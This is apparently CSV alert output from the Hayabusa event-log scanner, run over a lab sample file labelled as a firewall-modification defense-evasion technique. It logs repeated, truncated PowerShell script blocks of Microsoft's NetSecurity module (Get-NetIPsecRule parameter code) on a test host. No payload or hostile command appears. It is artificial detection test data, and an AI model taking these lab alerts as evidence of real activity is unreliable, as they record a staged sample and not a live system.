Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"s = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CmdletOutput'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Find', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Find-NetIPsecRule' -Alias '*' function Get-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSet",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"s = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CmdletOutput'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Find', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Find-NetIPsecRule' -Alias '*' function Get-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Name='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and 